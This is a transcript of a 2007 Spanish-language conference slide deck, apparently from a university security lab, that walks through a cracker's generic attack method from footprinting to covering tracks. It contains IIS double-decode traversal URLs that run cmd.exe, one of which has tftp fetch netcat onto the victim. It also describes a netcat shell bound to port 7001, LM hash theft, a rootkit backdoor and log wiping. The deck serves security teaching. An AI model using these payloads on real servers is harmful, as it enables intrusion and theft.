La descarga está en progreso. Por favor, espere

La descarga está en progreso. Por favor, espere

La Praxis del Cracker Miguel Torrealba S. Universidad Simón Bolívar Venezuela LACNIC X - Marzo 2007 - Margarita.

Presentaciones similares


Presentación del tema: "La Praxis del Cracker Miguel Torrealba S. Universidad Simón Bolívar Venezuela LACNIC X - Marzo 2007 - Margarita."— Transcripción de la presentación:

1 La Praxis del Cracker Miguel Torrealba S. Universidad Simón Bolívar Venezuela LACNIC X - Marzo Margarita

2 Laboratorio de Seguridad en Tecnología de la Información USB GISTI

3 La seguridad informática práctica es una sucesión de acciones y reacciones, de ataques y de defensas. Simson Garfinkel y Eugene Spafford (1999)

4 MÉTODO GENÉRICO DE ATAQUE La Praxis del Cracker – MTS – Margarita 2007

5 MÉTODO GENÉRICO DE ATAQUE Footprinting (Hallar el Rastro) La Praxis del Cracker – MTS – Margarita 2007

6 MÉTODO GENÉRICO DE ATAQUE La Praxis del Cracker – MTS – Margarita 2007

7 MÉTODO GENÉRICO DE ATAQUE La Praxis del Cracker – MTS – Margarita 2007

8 MÉTODO GENÉRICO DE ATAQUE La Praxis del Cracker – MTS – Margarita 2007

9 MÉTODO GENÉRICO DE ATAQUE La Praxis del Cracker – MTS – Margarita 2007

10 MÉTODO GENÉRICO DE ATAQUE La Praxis del Cracker – MTS – Margarita 2007

11 MÉTODO GENÉRICO DE ATAQUE La Praxis del Cracker – MTS – Margarita 2007

12 MÉTODO GENÉRICO DE ATAQUE La Praxis del Cracker – MTS – Margarita 2007

13 MÉTODO GENÉRICO DE ATAQUE Scanning (Exploración) La Praxis del Cracker – MTS – Margarita 2007

14 MÉTODO GENÉRICO DE ATAQUE La Praxis del Cracker – MTS – Margarita 2007

15 MÉTODO GENÉRICO DE ATAQUE La Praxis del Cracker – MTS – Margarita 2007

16 MÉTODO GENÉRICO DE ATAQUE La Praxis del Cracker – MTS – Margarita 2007

17 MÉTODO GENÉRICO DE ATAQUE La Praxis del Cracker – MTS – Margarita 2007

18 MÉTODO GENÉRICO DE ATAQUE La Praxis del Cracker – MTS – Margarita 2007

19 MÉTODO GENÉRICO DE ATAQUE La Praxis del Cracker – MTS – Margarita 2007

20 MÉTODO GENÉRICO DE ATAQUE - La salida ya provee un indicio del servidor web que se está ejecutando y del puerto que está atendiendo las peticiones - Empleando otras herramientas como nmap de Fyodor, que identifican el sistema operativo usando TCP Stack Fingerprinting se puede obtener una información más confiable La Praxis del Cracker – MTS – Margarita 2007

21 MÉTODO GENÉRICO DE ATAQUE La Praxis del Cracker – MTS – Margarita 2007

22 MÉTODO GENÉRICO DE ATAQUE La Praxis del Cracker – MTS – Margarita 2007

23 MÉTODO GENÉRICO DE ATAQUE Enumeration (Enumeración) La Praxis del Cracker – MTS – Margarita 2007

24 MÉTODO GENÉRICO DE ATAQUE La Praxis del Cracker – MTS – Margarita 2007

25 MÉTODO GENÉRICO DE ATAQUE La Praxis del Cracker – MTS – Margarita 2007

26 MÉTODO GENÉRICO DE ATAQUE La Praxis del Cracker – MTS – Margarita 2007

27 MÉTODO GENÉRICO DE ATAQUE La Praxis del Cracker – MTS – Margarita 2007

28 MÉTODO GENÉRICO DE ATAQUE La Praxis del Cracker – MTS – Margarita 2007

29 MÉTODO GENÉRICO DE ATAQUE La Praxis del Cracker – MTS – Margarita 2007

30 MÉTODO GENÉRICO DE ATAQUE La Praxis del Cracker – MTS – Margarita 2007

31 MÉTODO GENÉRICO DE ATAQUE La Praxis del Cracker – MTS – Margarita 2007

32 MÉTODO GENÉRICO DE ATAQUE La Praxis del Cracker – MTS – Margarita 2007

33 MÉTODO GENÉRICO DE ATAQUE La Praxis del Cracker – MTS – Margarita 2007

34 MÉTODO GENÉRICO DE ATAQUE La Praxis del Cracker – MTS – Margarita 2007

35 MÉTODO GENÉRICO DE ATAQUE La Praxis del Cracker – MTS – Margarita 2007

36 MÉTODO GENÉRICO DE ATAQUE Gainning Access (Ganar Acceso) La Praxis del Cracker – MTS – Margarita 2007

37 MÉTODO GENÉRICO DE ATAQUE %255c../..%255c../winnt/system32/ cmd.exe?c+dir+c:\ - Explotando la vulnerabilidad Decode del IIS 4.0 y 5.0, el Cracker puede examinar el contenido de cualquier carpeta del sistema víctima. - Para lograr eso solo requiere ejecutar el comando dir de la consola de comandos a través del servidor web La Praxis del Cracker – MTS – Margarita 2007

38 MÉTODO GENÉRICO DE ATAQUE %255c../..%255c../winnt/system32/ cmd.exe?c+dir+c:\ -..%255c.. =..(%25)5c.. =..%5c.. =..(%5c).. =.. \.. - Estructura lógica del disco de Jeremias: C: \ Inetpub \ scripts \ Winnt \ system32 \ La Praxis del Cracker – MTS – Margarita 2007

39 MÉTODO GENÉRICO DE ATAQUE La Praxis del Cracker – MTS – Margarita 2007

40 MÉTODO GENÉRICO DE ATAQUE La Praxis del Cracker – MTS – Margarita 2007

41 MÉTODO GENÉRICO DE ATAQUE La Praxis del Cracker – MTS – Margarita 2007

42 MÉTODO GENÉRICO DE ATAQUE La Praxis del Cracker – MTS – Margarita 2007

43 MÉTODO GENÉRICO DE ATAQUE La Praxis del Cracker – MTS – Margarita 2007

44 MÉTODO GENÉRICO DE ATAQUE La Praxis del Cracker – MTS – Margarita 2007

45 MÉTODO GENÉRICO DE ATAQUE La Praxis del Cracker – MTS – Margarita 2007

46 MÉTODO GENÉRICO DE ATAQUE %255c../..%255c../winnt/system32/ cmd.exe?c+c:\winnt/system32/tftp. exe+-i get+nc.exe - Explotando la vulnerabilidad Decode del IIS 4.0 y 5.0, el Cracker puede ejecutar el cliente ftp para transferir los archivos que desee al sistema víctima. La Praxis del Cracker – MTS – Margarita 2007

47 MÉTODO GENÉRICO DE ATAQUE La Praxis del Cracker – MTS – Margarita 2007

48 MÉTODO GENÉRICO DE ATAQUE La Praxis del Cracker – MTS – Margarita 2007

49 MÉTODO GENÉRICO DE ATAQUE La Praxis del Cracker – MTS – Margarita 2007

50 MÉTODO GENÉRICO DE ATAQUE %255c../..%255c../winnt/system32/ cmd.exe?c+dir+c:\Inetpub\scripts - Explotando la vulnerabilidad Decode del IIS 4.0 y 5.0, el Cracker puede verificar que el archivo que deseaba transferir al sistema víctima llegó correctamente y en cual carpeta reposa. La Praxis del Cracker – MTS – Margarita 2007

51 MÉTODO GENÉRICO DE ATAQUE La Praxis del Cracker – MTS – Margarita 2007

52 MÉTODO GENÉRICO DE ATAQUE Hora de transferir un exploit - Httpodbc.dll es una biblioteca de enlace dinámica que permitirá al Cracker ejecutar, por medio del navegador, un programa que elevará los privilegios de ejecución y proveerá una interfaz más amigable. Se podrá así, ejecutar cualquier otro programa que se quiera, explotando la misma vulnerabilidad Decode del IIS 4.0 y Para el servidor web del sistema de la víctima este programa parecerá un código script que ha sido colocado para que los usuarios finales lo ejecuten La Praxis del Cracker – MTS – Margarita 2007

53 MÉTODO GENÉRICO DE ATAQUE La Praxis del Cracker – MTS – Margarita 2007

54 MÉTODO GENÉRICO DE ATAQUE La Praxis del Cracker – MTS – Margarita 2007

55 MÉTODO GENÉRICO DE ATAQUE La Praxis del Cracker – MTS – Margarita 2007

56 MÉTODO GENÉRICO DE ATAQUE La Praxis del Cracker – MTS – Margarita 2007

57 MÉTODO GENÉRICO DE ATAQUE La Praxis del Cracker – MTS – Margarita 2007

58 MÉTODO GENÉRICO DE ATAQUE La Praxis del Cracker – MTS – Margarita 2007

59 MÉTODO GENÉRICO DE ATAQUE La Praxis del Cracker – MTS – Margarita 2007

60 MÉTODO GENÉRICO DE ATAQUE Ya es posible ejecutar, en forma más fácil, cualquier comando del sistema de operación a través del servidor web IIS 4.0 o 5.0 La Praxis del Cracker – MTS – Margarita 2007

61 MÉTODO GENÉRICO DE ATAQUE Escalating Privilege (Escalar Privilegios) La Praxis del Cracker – MTS – Margarita 2007

62 MÉTODO GENÉRICO DE ATAQUE La Praxis del Cracker – MTS – Margarita 2007

63 MÉTODO GENÉRICO DE ATAQUE Con esta orden se procede a ejecutar NETCAT la navaja del ejército suizo de Hackers de sombrero blanco y negro, que activa una consola de comandos en el puerto 7001 del sistema víctima Un nuevo servicio de comandos queda escuchando desde ese instante La Praxis del Cracker – MTS – Margarita 2007

64 MÉTODO GENÉRICO DE ATAQUE La Praxis del Cracker – MTS – Margarita 2007

65 MÉTODO GENÉRICO DE ATAQUE La Praxis del Cracker – MTS – Margarita 2007

66 MÉTODO GENÉRICO DE ATAQUE La Praxis del Cracker – MTS – Margarita 2007

67 MÉTODO GENÉRICO DE ATAQUE La Praxis del Cracker – MTS – Margarita 2007

68 MÉTODO GENÉRICO DE ATAQUE Desde una consola de comandos local –el atacante- ejecuta ahora un telnet al puerto 7001 del sistema de la víctima La idea es disponer de un login remoto que permita ejecutar comandos en el sistema víctima Telnet puede operar entre equipos con diferentes Sistemas de Operación y provee un terminal virtual en la red La Praxis del Cracker – MTS – Margarita 2007

69 MÉTODO GENÉRICO DE ATAQUE La Praxis del Cracker – MTS – Margarita 2007

70 MÉTODO GENÉRICO DE ATAQUE Con el Telnet se ha establecido una conexión TCP a la consola de comandos que escucha peticiones en el puerto 7001 del sistema víctima. Recuérdese que Telnet maneja ambos extremos del canal en forma simétrica Telnet permite además ver la salida de la ejecución de la órdenes remotas en la pantalla local. Es un servicio transparente Cualquier orden en el sistema víctima es posible de ser ejecutada, con todos los privilegios y en forma tan amigable que parecería ser un comando local La Praxis del Cracker – MTS – Margarita 2007

71 MÉTODO GENÉRICO DE ATAQUE La Praxis del Cracker – MTS – Margarita 2007

72 MÉTODO GENÉRICO DE ATAQUE La Praxis del Cracker – MTS – Margarita 2007

73 MÉTODO GENÉRICO DE ATAQUE La Praxis del Cracker – MTS – Margarita 2007

74 MÉTODO GENÉRICO DE ATAQUE La Praxis del Cracker – MTS – Margarita 2007

75 MÉTODO GENÉRICO DE ATAQUE Pilfering (Ratería, Vileza, Bajeza, Ruindad) La Praxis del Cracker – MTS – Margarita 2007

76 MÉTODO GENÉRICO DE ATAQUE El Cracker extrae entonces las cuentas y los LM Hashes de las contraseñas. Posteriormente puede usar un programa tipo Crackeador La Praxis del Cracker – MTS – Margarita 2007

77 MÉTODO GENÉRICO DE ATAQUE Esta es una posible salida de lo que se obtendría. De esta forma el Cracker puede ahora suplantar a los usuarios autorizados en el sistema La Praxis del Cracker – MTS – Margarita 2007

78 MÉTODO GENÉRICO DE ATAQUE Creating Backdoors (Crear las Puertas Traseras) La Praxis del Cracker – MTS – Margarita 2007

79 MÉTODO GENÉRICO DE ATAQUE Ahora el Cracker puede sembrar calquier programa tipo backdoor que le permita volver a entrar en el sistema víctima y ganar privilegios, incluso si la vulnerabilidad Decode del IIS 4.0 y 5.0 es subsanada La Praxis del Cracker – MTS – Margarita 2007

80 MÉTODO GENÉRICO DE ATAQUE La Praxis del Cracker – MTS – Margarita 2007

81 MÉTODO GENÉRICO DE ATAQUE La Praxis del Cracker – MTS – Margarita 2007

82 MÉTODO GENÉRICO DE ATAQUE Rootkit HD 1.0 – versión de evaluación - - Opera en sistemas WNT/W2K/WXP - Parecido a un troyano, pero con características adicionales para ocultar su existencia y ejecución. Intercepta las llamadas a la API Win32 de Windows y altera la respuesta - Genera un nuevo servicio Hacker Defender 100 sobre cualquier puerto del sistema víctima y se comunica con el atacante a través de un programa cliente bdclient - Puede adaptar su funcionamiento para disponer de distintas formas de operación - Provee facilidad de contraseña para controlar su ejecución La Praxis del Cracker – MTS – Margarita 2007

83 MÉTODO GENÉRICO DE ATAQUE Covering Tracks (Cubrir las Huellas) La Praxis del Cracker – MTS – Margarita 2007

84 MÉTODO GENÉRICO DE ATAQUE Finalmente, si se han transferido programas para alterar los logs, el Cracker puede borrar fácilmente toda huella de su actividad. En caso contrario puede hacerlo manualmente La Praxis del Cracker – MTS – Margarita 2007

85 MÉTODO GENÉRICO DE ATAQUE La Praxis del Cracker – MTS – Margarita 2007

86 MÉTODO GENÉRICO DE ATAQUE La Praxis del Cracker – MTS – Margarita 2007

87 MÉTODO GENÉRICO DE ATAQUE La Praxis del Cracker – MTS – Margarita 2007

88 MÉTODO GENÉRICO DE ATAQUE La Praxis del Cracker – MTS – Margarita 2007

89 MÉTODO GENÉRICO DE ATAQUE Un administrador medianamente experimentado sospechará de inmediato si observa una salida como la anterior y la de abajo La Praxis del Cracker – MTS – Margarita 2007

90 _________________________________ CIERRE Conoced al enemigo y conoceos vos mismos; en cien batallas nunca correréis ningún peligro. Sun Tzu El Arte de la Guerra La Praxis del Cracker – MTS – Margarita 2007


Descargar ppt "La Praxis del Cracker Miguel Torrealba S. Universidad Simón Bolívar Venezuela LACNIC X - Marzo 2007 - Margarita."

Presentaciones similares


Anuncios Google